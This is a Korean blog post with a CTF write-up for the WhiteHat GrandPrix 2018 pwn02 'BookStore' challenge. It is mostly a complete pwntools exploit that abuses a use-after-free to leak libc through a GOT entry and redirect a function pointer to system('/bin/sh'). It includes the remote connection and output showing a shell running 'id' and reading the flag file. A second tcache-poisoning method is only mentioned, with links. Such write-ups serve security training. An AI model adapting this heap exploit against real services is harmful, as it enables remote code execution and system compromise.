Category : pwnable
nc pwn02.grandprix.whitehatvn.com 8005 file: material.grandprix.whitehatvn.com/pwn02 |
libc-2.27.so
Summary : simple uaf, libc-2.27.so, tcache poisoning
2 ways to exploit
(1) simple uaf
#!/usr/bin/python
from pwn import *
def cmd_add(title, brief_size, brief, refer, best):
ru('Your choice')
sl('1')
ru('Title:')
sl(title)
ru('Enter brief size')
sl(str(brief_size))
ru('Enter brief:')
sl(brief)
ru('Reference book title:')
sl(refer)
ru('Best Selling? (Y/N)')
sl('y' if best else 'n')
ru('a book is added.')
def cmd_edit(old_title, new_title, brief_size, brief, best):
ru('Your choice')
sl('2')
ru('Old title:')
sl(old_title)
ru('New title:')
sl(old_title)
ru('Enter brief size')
sl(str(brief_size))
ru('Enter brief:')
sl(brief)
ru('Best Selling? (Y/N)')
sl('y' if best else 'n')
ru('Entry is edited.')
def cmd_remove(title):
ru('Your choice')
sl('3')
ru('Title:')
sl(title)
ru('Entry is removed.')
def cmd_list():
ru('Your choice')
sl('4')
ru('|----+-------------------------------+-----------------------------------------|\n')
ru('|----+-------------------------------+-----------------------------------------|\n')
res = []
while 1:
line = rl()
if line == '|----+-------------------------------+-----------------------------------------|\n':
break
else:
line = line.split('|')
res.append(line[3].strip())
return res
offset_puts = 0x809c0
offset_system = 0x4f440
offset_sh = 0x13b67
puts_got = 0x601F80
printf_got = 0x601FA0
puts_plt = 0x400908
strdup_plt = 0x400980
#s = process('./BookStore')
s = remote('pwn02.grandprix.whitehatvn.com',8005)
ru = s.recvuntil
rl = s.recvline
sl = s.sendline
ss = s.send
cmd_add('title1', 0x20, 'brief', '', False)
cmd_add('title2', 0x10, 'brief', '', True)
cmd_add('not used', 0x60, 'kkkk', '', False) # prevent consolidate
cmd_remove('title2')
cmd_edit('title2', 'title2', 5, 'aaa', True) # free brief, obj2
fake_obj = ''
fake_obj += p64(0) # next
fake_obj += p64(puts_got) # brief
fake_obj += 'title2'.ljust(0x20, '\x00') # title
fake_obj += chr(0)
fake_obj += chr(0)
fake_obj += p64(strdup_plt)[:-1]
cmd_edit('title1', 'title1', 0x3a, fake_obj, False)
libc_base = u64(cmd_list()[1].ljust(8, '\x00')) - offset_puts
libc_system = libc_base + offset_system
libc_sh = libc_base + offset_sh
print hex(libc_base)
fake_obj = ''
fake_obj += p64(0) # next
fake_obj += p64(libc_sh) # brief
fake_obj += 'title2'.ljust(0x20, '\x00') # title
fake_obj += chr(0)
fake_obj += chr(0)
fake_obj += p64(libc_system)[:-1]
cmd_edit('title1', 'title1', 0x3a, fake_obj, False)
ru('Your choice')
sl('4')
s.interactive()
s.close()
그러고보니 세 번째 청크는 필요가 없었나
$ python ex.py
[+] Opening connection to pwn02.grandprix.whitehatvn.com on port 8005: Done
0x7f0c0cbec000
[*] Switching to interactive mode
:$
$
|----+-------------------------------+-----------------------------------------|
| ID| Title|Brief
|----+-------------------------------+-----------------------------------------|
|0001| title1|
$
$ id
uid=1000(bookstore) gid=1000(bookstore) groups=1000(bookstore)
$ cat /home/bookstore/flag.txt
WhiteHat{????????????????????????????}
(2) tcache poisoning
TCache (per-thread cache), a new feature, was introduced in malloc (glibc-2.26 ~ )
https://dangokyo.me/2018/01/16/extra-heap-exploitation-tcache-and-potential-exploitation/
http://pwn3r.tistory.com/entry/tcache-note
추가예정
'CTF > 2018' 카테고리의 다른 글
| WhiteHat GrandPrix 2018 QUAL - pwn03 (onehit) (0) | 2018.08.24 |
|---|---|
| SECCON 2017 QUAL - secure_keymanager (0) | 2018.08.22 |
| WhiteHat GrandPrix 2018 QUAL - pwn01 (giftshop) (0) | 2018.08.19 |
| WhiteHat GrandPrix 2018 QUAL - web03 (0) | 2018.08.19 |
| CODEBLUE 2018 QUAL - game revenge (Exploit only) (0) | 2018.08.03 |